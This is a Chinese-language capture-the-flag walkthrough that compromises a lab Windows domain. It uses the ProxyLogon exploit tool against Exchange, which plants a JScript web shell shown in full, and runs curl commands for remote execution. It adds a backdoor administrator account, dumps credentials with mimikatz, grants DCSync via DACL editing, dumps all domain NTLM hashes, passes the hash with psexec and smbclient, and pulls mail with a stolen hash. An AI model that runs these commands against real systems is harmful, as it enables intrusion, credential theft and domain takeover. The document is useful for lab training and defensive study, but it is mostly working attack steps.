309 └─ 172.22.3.26
310[2025-04-09 00:55:41] [SUCCESS] NetBios 172.22.3.9 XIAORANG-EXC01.xiaorang.lab Windows Server 2016 Datacenter 14393
311[2025-04-09 00:55:42] [SUCCESS] SMTP服务 172.22.3.9:25 允许匿名访问
312[2025-04-09 00:55:42] [SUCCESS] 网站标题 https://172.22.3.9 状态码:302 长度:0 标题:无标题 重定向地址: https://172.22.3.9/owa/
313[2025-04-09 00:55:42] [SUCCESS] 网站标题 https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 状态码:200 长度:28237 标题:Outlook
314[2025-04-09 00:55:42] [SUCCESS] 网站标题 https://172.22.3.9:8172 状态码:404 长度:0 标题:无标题
扫到三台机子
172.22.3.9 XIAORANG-EXC01
172.22.3.2 DC:XIAORANG-WIN16.xiaorang.lab
172.22.3.26 XIAORANG-PC
172.22.3.9上有一个exchange服务,有nday,直接上exprolog
1python .\exprolog.py -t 172.22.3.9 -e administrator@xiaorang.lab
2
3___________ __________ .__
4\_ _____/__ __\______ \_______ ____ | | ____ ____
5 | __)_\ \/ /| ___/\_ __ \/ _ \| | / _ \ / ___\
6 | \> < | | | | \( <_> ) |_( <_> ) /_/ >
7/_______ /__/\_ \|____| |__| \____/|____/\____/\___ /
8 \/ \/ /_____/
9
10[#] Trying to get target FQDN
11[+] Got target FQDN: XIAORANG-EXC01
12[#] Trying to get target LegacyDN and ServerID
13[+] Got target LegacyDN: /o=XIAORANG LAB/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=8ca6ff254802459d9f63ee916eabb487-Administrat
14[+] Got target ServerID: b5ebdaa1-b4b3-4b71-ab32-7d03b4955a75
15[#] Trying to get target user SID
16[+] Got target administrator SID: S-1-5-21-533686307-2117412543-4200729784-500
17[#] Trying to get target administrator cookie sessions
18[+] Got target administrator session ID: fefab382-b49c-4a85-a748-8cee14485956
19[+] Got target administrator canary session ID: atsaGpfQ70qSuQAOEtYUV5LqJeTxeN0IkjUqGKytbR0zbRHwhB5ynGGNyD8fBXd6AyUH2qDHj9M.
20[#] Trying to get target OABVirtualDirectory ID
21[+] Got target AOB ID: 6d8fb74b-8477-43ee-83ba-0b119205e85f
22[#] Trying to inject OABVirtualDirectory Shell
23[+] Shell are injected
24[#] Verifying OABVirtualDirectory Shell
25[+] AOB Shell verified
26[+] AOB Shell payload: http:\/\/ooo\/#%3Cscript%20language=%22JScript%22%20runat=%22server%22%3Efunction%20Page_Load()%7Beval(Request%5B%22request%22%5D,%22unsafe%22);%7D%3C\/script%3E
27[#] Trying to export OABVirtualDirectory Shell
28[+] Shell are exported
29[*] CURL Request:
30curl --request POST --url https://172.22.3.9/owa/auth/pjo2b.aspx --header 'Content-Type: application/x-www-form-urlencoded' --data 'request=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami /all").stdout.readall())' -k
31[*] DONE
发现可以RCE
proxychains4 curl --request POST --url https://172.22.3.9/owa/auth/pjo2b.aspx --header 'Content-Type: application/x-www-form-urlencoded' --data 'request=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami").stdout.readall())' -k
写用户RDP上去拿flag
net user xrntkk abc123456 /add
net localgroup administrators xrntkk /add
1Yb dP 88 db dP"Yb 88""Yb db 88b 88 dP""b8
2 YbdP 88 dPYb dP Yb 88__dP dPYb 88Yb88 dP `"
3 dPYb 88 dP__Yb Yb dP 88"Yb dP__Yb 88 Y88 Yb "88
4dP Yb 88 dP""""Yb YbodP 88 Yb dP""""Yb 88 Y8 YboodP
5
6
7 / /
8 / / _ __ ( ) ___
9 / / // / / // ) ) ) ) / / // ) )
10 / / // / / // / / / / / / // / /
11/ /____/ / ((___( ( // / / / / / / ((___( (
12
13
14
15flag02: flag{aefcc6d0-0d3c-44aa-b96c-c8ad50e6d2d4}
FLAG4
信息收集一手
这是域内的一台机子
接着传个mimikatz,抓取哈希
用管理员打开mimikatz
log
privilege::Debug
sekurlsa::logonpasswords
exit
抓到两个hash
一个是机器用户的hash,一个是用户zhangtong
Authentication Id : 0 ; 10480581 (00000000:009febc5)
Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/4/9 20:32:31
SID : S-1-5-90-0-3
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 9b2081c3dc250a9b0a55c54c4dcc9cbb
* SHA1 : 336d62cd7f3bc62aba936763ace82491e96f2eed
Authentication Id : 0 ; 105924 (00000000:00019dc4)
Session : Service from 0
User Name : Zhangtong
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2025/4/9 19:36:36
SID : S-1-5-21-533686307-2117412543-4200729784-1147
msv :
[00000003] Primary
* Username : Zhangtong
* Domain : XIAORANG
* NTLM : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b
接下来利用system权限用bloodhound信息收集一波
proxychains4 bloodhound-python -u "XIAORANG-EXC01$" --hashes :9b2081c3dc250a9b0a55c54c4dcc9cbb -d xiaorang.lab -dc XIAORANG-WIN16.xiaorang.lab -c all --dns-tcp -ns 172.22.3.2 --auth-method ntlm --zip
发现这台机子对域内的用户具有WriteDACL权限,也就是说我们可以利用机器用户给域内的用户添加dcsync权限,从而拿到域管的hash。
python dacledit.py xiaorang.lab/XIAORANG-EXC01$ -hashes :9b2081c3dc250a9b0a55c54c4dcc9cbb -action write -rights DCSync -principal XIAORANG-EXC01$ -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2
接下来我们就可以利用dcsync去dump域管的hash了
proxychains4 python3 psexec.py xiaorang.lab/XIAORANG-EXC01\$@172.22.3.9 -hashes ':9b2081c3dc250a9b0a55c54c4dcc9cbb' -codec gbk
c:\> .\mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'XIAORANG-WIN16.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt b8fa79a52e918cb0cbcd1c0ede492647 514
1137 HealthMailboxeda7a84 1e89e23e265bb7b54dc87938b1b1a131 66048
1138 HealthMailbox33b01cf 0eff3de35019c2ee10b68f48941ac50d 66048
1139 HealthMailbox9570292 e434c7db0f0a09de83f3d7df25ec2d2f 66048
1140 HealthMailbox3479a75 c43965ecaa92be22c918e2604e7fbea0 66048
1141 HealthMailbox2d45c5b 4822b67394d6d93980f8e681c452be21 66048
1142 HealthMailboxec2d542 147734fa059848c67553dc663782e899 66048
1143 HealthMailboxf5f7dbd e7e4f69b43b92fb37d8e9b20848e6b66 66048
1144 HealthMailbox67dc103 4fe68d094e3e797cfc4097e5cca772eb 66048
1145 HealthMailbox320fc73 0c3d5e9fa0b8e7a830fcf5acaebe2102 66048
1146 Lumia 862976f8b23c13529c2fb1428e710296 512
500 Administrator 7acbc09a6c0efd81bfa7d5a1d4238beb 512
1000 XIAORANG-WIN16$ 5410e4604b240a6d7bab43f67637b109 532480
1147 Zhangtong 22c7f81993e96ac83ac2f3f1903de8b4 512
1103 XIAORANG-EXC01$ 9b2081c3dc250a9b0a55c54c4dcc9cbb 4096
1104 XIAORANG-PC$ fc840d385551c896c88c32a65ab5c5ad 4096
1135 HealthMailbox8446c5b a79a671473279d21ca92fcc8251ec143 66048
1136 HealthMailbox0d5918e 0e9b8e002d34d405e866b4820dfe36eb 66048
mimikatz(commandline) # exit
Bye!
拿到域管hash,那我们接下来就可以随意横向了
500 Administrator 7acbc09a6c0efd81bfa7d5a1d4238beb 512
横向拿flag
proxychains4 python3 psexec.py administrator@172.22.3.2 -hashes ':7acbc09a6c0efd81bfa7d5a1d4238beb' -codec gbk
c:\Users\Administrator\flag> type flag.txt
____ ___.___ _____ ________ __________ _____ _______ ________
\ \/ /| | / _ \ \_____ \\______ \ / _ \ \ \ / _____/
\ / | |/ /_\ \ / | \| _/ / /_\ \ / | \/ \ ___
/ \ | / | \/ | \ | \/ | \/ | \ \_\ \
/___/\ \|___\____|__ /\_______ /____|_ /\____|__ /\____|__ /\______ /
\_/ \/ \/ \/ \/ \/ \/
flag04: flag{204e2d62-c729-4840-8b25-a6c07b6aad44}
拿到flag4
FLAG3
接下来横向去26拿flag3
proxychains4 impacket-smbclient -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/administrator@172.22.3.26 -dc-ip 172.22.3.2
use C$
cd /users/lumia/desktop
在C:\users\lumia\desktop找到一个secret.zip,我们把它get下来
secret.zip里面有个flag.docx
但是secret.zip需要密码
这里要利用上面拿到的lumia的hash,将outlook中的邮件下载下来
1146 Lumia 862976f8b23c13529c2fb1428e710296 512
python pthexchange.py --target https://172.22.3.9 --username Lumia --password "00000000000000000000000000000000:862976f8b23c13529c2fb1428e710296" --action Download
拿到两封邮件
第一封附件是刚刚的secret.zip,提示说用手机号解密
第二封邮件中附件是一堆名字和手机号
我们用手机号作为字典进行爆破
18763918468
拿到flag3
